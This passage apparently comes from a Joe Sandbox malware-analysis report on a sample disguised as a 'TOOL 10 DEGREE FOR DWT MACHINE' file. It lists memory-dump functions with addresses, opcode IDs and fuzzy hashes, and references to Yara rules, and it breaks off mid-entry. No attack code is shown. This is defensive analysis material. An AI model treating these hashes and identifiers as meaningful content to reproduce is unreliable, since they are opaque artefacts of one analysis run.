                                                                                                                                                                                                                          • Instruction ID: a4bf5e82b4e8bc05c8f447ff63f5f3f5982684e7b874ed02cbe993bdfd20c586
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d75fd0c90902a46d94cac25c5502ee9ed265d520f2e283aca0061debab06c1ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FD1B278E00218CFDB55DFA9C950B9DBBB2FF89300F1081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385EC030 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 139cce7156fca553e0b2c96439439e353d8e9f28f0a2e01d1476d4ce93eb3997
                                                                                                                                                                                                                          • Instruction ID: 0e6a21c31ecd4d56498a31b006d523e1721d55525580dde0fac4a20f04e9638a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 139cce7156fca553e0b2c96439439e353d8e9f28f0a2e01d1476d4ce93eb3997
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DD1A178E002188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355E86CF51
                                                                                                                                                                                                                          Function 385EE020 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction ID: 53588b00e217b4f62c7f4c12953312ed5369fc41119abe4207c62b06888c237e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED1B178E00218CFDB55DFA5C951B9DBBB2FF89300F1081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Function 385EEDD0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ecef4d5fab639cdf09c5c5b6760196ede84456cdffcdcf778d18f2449ca16706
                                                                                                                                                                                                                          • Instruction ID: 3455082899f78f01a97f0e9d4193894e2a6372674b513e98052582e59711e95e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecef4d5fab639cdf09c5c5b6760196ede84456cdffcdcf778d18f2449ca16706
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD1B178E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385EC4C0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 823581073c8b74343b05602b62af853dd444af23771eafdaa846a7392a5ec67b
                                                                                                                                                                                                                          • Instruction ID: 680305d4ce4a3d6d496f1c6470db2aaf96e40c97d37f63a43c05f278bbc885b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823581073c8b74343b05602b62af853dd444af23771eafdaa846a7392a5ec67b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D1A178E002188FDB55DFA5C950B9DBBB2FF89300F1081A9D849AB364DB356E85CF51
                                                                                                                                                                                                                          Function 385EADF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 682d78885035704a947ab5df72aa0b48cbc6b096f9ed79a8b5a596a45cedf041
                                                                                                                                                                                                                          • Instruction ID: a557019968fb78333ed7b89f4510f9cf556913d062b743e3d0aef31cc6a10d46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 682d78885035704a947ab5df72aa0b48cbc6b096f9ed79a8b5a596a45cedf041
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D1B278E012188FDB55DFA5C940B9DBBB2FF89300F5081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Function 385EF6F0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 005860c526f3934347340d294ca7660b870bf2953798b0b2a47abf3d5c79c9e4
                                                                                                                                                                                                                          • Instruction ID: f378ea109c99d272e4bd84ffbd3085080ebc4645e2a48895d240119464026925
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 005860c526f3934347340d294ca7660b870bf2953798b0b2a47abf3d5c79c9e4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D1A178E003188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385ECDE0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d9c0d0e4d4db98c85e108a41a11ac0d59fff89ba5c3dd4739359303100236b08
                                                                                                                                                                                                                          • Instruction ID: 821625da9e5ef0572b26ab0e99c1ff6e0783512b299aa13ce6f135c18cc716c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c0d0e4d4db98c85e108a41a11ac0d59fff89ba5c3dd4739359303100236b08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD1B178E002188FDB55DFA5C950B9DBBB2FF89300F1081A9D848AB364DB356E86CF51
                                                                                                                                                                                                                          Function 385EDB90 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction ID: d613414ca1fd4d703a9b4f218dae895be566893ead351f910b6a2218e55d861a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6be2c1babe78f38169c17d73c8a44921e3b77dfda2bb4830228f3d9d8044641
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD1A278E003188FDB55DFA9C950B9DBBB2FF89300F1081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385EB280 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ad1dc0ff240387553cdb298456ea280486d99796be5c7a338aeacbbc20ac2dbc
                                                                                                                                                                                                                          • Instruction ID: 124d3db52b210336deb44591933d3c42d8b3d101e984e8e31fc6903e06128ccb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1dc0ff240387553cdb298456ea280486d99796be5c7a338aeacbbc20ac2dbc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FED1B178E012188FDB55DFA5C940B9DBBB2FF89300F6081A9D848BB364DB355A85CF51
                                                                                                                                                                                                                          Function 385DF810 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7655f5deb70c6d4a095c33967a65fb157d204e798336920a62c69d1a92a9a2f5
                                                                                                                                                                                                                          • Instruction ID: 9adb87765f06033a87309647df1236ffb55f41b10d65513086c95effb67ecd7a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7655f5deb70c6d4a095c33967a65fb157d204e798336920a62c69d1a92a9a2f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78C1A174E01218CFEB54DFA9C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385DEF60 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 499090ab9d70be69ae7edadb33d647ff902c1fff914a3e703e916b9cafc7ea62
                                                                                                                                                                                                                          • Instruction ID: 9193ad08160f36f67c18b4e46a272ed84c9183b7997a75b933aa9f2e4203e964
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499090ab9d70be69ae7edadb33d647ff902c1fff914a3e703e916b9cafc7ea62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AC1A074E00218CFDB54DFA9C955B9DBBB2FF88300F6081A9D809AB365DB355A85CF50
                                                                                                                                                                                                                          Function 385DF3B8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a27f18023d0e906b6eca67214b4e3c8c6de7001942248cdcc49764669192b67c
                                                                                                                                                                                                                          • Instruction ID: db9407c703e10b121318d1dcec4771d8f6edee3dbceba003a3428e0e0b8844f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a27f18023d0e906b6eca67214b4e3c8c6de7001942248cdcc49764669192b67c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AC1A074E00218CFEB54DFA9C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 38C81710 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9589759ebac4c296513e812a07401ce2823f0d4a1928e8760b8dbdcc24264d89
                                                                                                                                                                                                                          • Instruction ID: c695346436aa6ab72a848bc770064ca631a27637edd85528e88202e431ccca4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9589759ebac4c296513e812a07401ce2823f0d4a1928e8760b8dbdcc24264d89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9C1AF74E00218CFDB54DFA5C955B9DBBF2BF88304F6081AAD808AB3A5DB355A85CF50
                                                                                                                                                                                                                          Function 385E2758 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c98f55e554a84b18296ed4e4df5eaff714c1d1ae4289f8dcad55b4afa5d1b1bd
                                                                                                                                                                                                                          • Instruction ID: 08060519f07bd2cf8fb797707731d5053695b826391f96aade73c127ccb79d2d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c98f55e554a84b18296ed4e4df5eaff714c1d1ae4289f8dcad55b4afa5d1b1bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91C1A074E00218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E1A50 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 612c7b44ad05746ff52a71996c476ef728546164414e21b590168986faf80736
                                                                                                                                                                                                                          • Instruction ID: 5c13e92d0a7479445e1f8bea15c8915986d18e6fd131fd59d4cfd49079f642a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 612c7b44ad05746ff52a71996c476ef728546164414e21b590168986faf80736
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC1A074E01218CFEB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB355E85CF50
                                                                                                                                                                                                                          Function 385E8748 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0cdf139316fb8ff77339cbedf71c551f2e7b97c4420570457f62d4a24ab7ef80
                                                                                                                                                                                                                          • Instruction ID: 6a28c9fdaae798b40b09168f4f0d1683b82ba42fb047e8e9a42cb93b87d464a2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cdf139316fb8ff77339cbedf71c551f2e7b97c4420570457f62d4a24ab7ef80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EC1B074E00218CFDB54DFA5C995B9DBBB2BF88300F6081A9D808AB365DB355E85CF51
                                                                                                                                                                                                                          Function 385E0D48 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6fccb4bd8e6b61d3a1d7da30b9beda8892dedf5aa3b8040137ef57bfe53856de
                                                                                                                                                                                                                          • Instruction ID: 620d8371fafe585a07865481121a63b9d09e05bc3747cc37e27cae3b16d789a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fccb4bd8e6b61d3a1d7da30b9beda8892dedf5aa3b8040137ef57bfe53856de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CC1A074E01218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E0040 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: efc09075f0619acc67d493bd9a04224a044121f2b09a348ac11213c94338c2d2
                                                                                                                                                                                                                          • Instruction ID: ae20c1609733f379b03f203201321b406460a7a47dc606f7c997e6f3230f7188
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc09075f0619acc67d493bd9a04224a044121f2b09a348ac11213c94338c2d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC1A078E00218CFDB55DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Function 385E7A40 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b26a8169df14a136767a870c0210b9c6ad95a9f7043fed4087dfb4fa23639ba6
                                                                                                                                                                                                                          • Instruction ID: 8b18c1870d0c2f39d183905f23aa202d0bf765469ec293bb8bed78681438cdda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b26a8169df14a136767a870c0210b9c6ad95a9f7043fed4087dfb4fa23639ba6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07C19F74E00218CFEB55DFA5C955B9DBBB2AF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E5B78 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a4fd4cc78f374269df66f2e319a49eceb688ca70cffd34042929b2207c05d04a
                                                                                                                                                                                                                          • Instruction ID: 6070f0c3c781f5ce869b699f97c03c45b4f05716f4ee6fa13d0d36637e991a2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4fd4cc78f374269df66f2e319a49eceb688ca70cffd34042929b2207c05d04a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26C1B174E00218CFDB54DFA5C955B9DBBB2BF88300F6081A9D808AB3A5DB359E85CF50
                                                                                                                                                                                                                          Function 385E4E70 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 826792fe351a2f72260c87ee3d23f4e68149e350b043d165fca09dd48cb41be3
                                                                                                                                                                                                                          • Instruction ID: 7cbcbe53136ad9633c07f375ef5e7dcf13112164eed697ea0afb7a863f64f3a2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 826792fe351a2f72260c87ee3d23f4e68149e350b043d165fca09dd48cb41be3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77C1A074E00218CFDB55DFA5C995B9DBBB2BF88300F6080A9D808AB365DB355E85CF51
                                                                                                                                                                                                                          Function 385E4168 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 271a58ac6dc569d4983a82e455a897094110da8e1b2a8a0dc046ad4b17d3b425
                                                                                                                                                                                                                          • Instruction ID: 21c4f17cce96d4fbcd6789fa2c139d0add3c71f714f7fc7490b2058da9dba7ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 271a58ac6dc569d4983a82e455a897094110da8e1b2a8a0dc046ad4b17d3b425
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0C1A074E00218CFEB54DFA5C955B9DBBB2BF88300F6081A9D808AB365DB359E85CF50
                                                                                                                                                                                                                          Function 385E3460 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fc15367a1378fa57806b8f655d504ae52caf5cf95bd4ce5c8f1363d8a713272c
                                                                                                                                                                                                                          • Instruction ID: 9ca74c5e3f1aaa307689ab0259fc07e646c22e8d424d738b10d677a1dc631a3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc15367a1378fa57806b8f655d504ae52caf5cf95bd4ce5c8f1363d8a713272c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1AF74E01218CFDB54DFA5C995BDDBBB2BF88300F6081A9D808AB365DB359A85CF50
                                                                                                                                                                                                                          Function 385E4A18 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
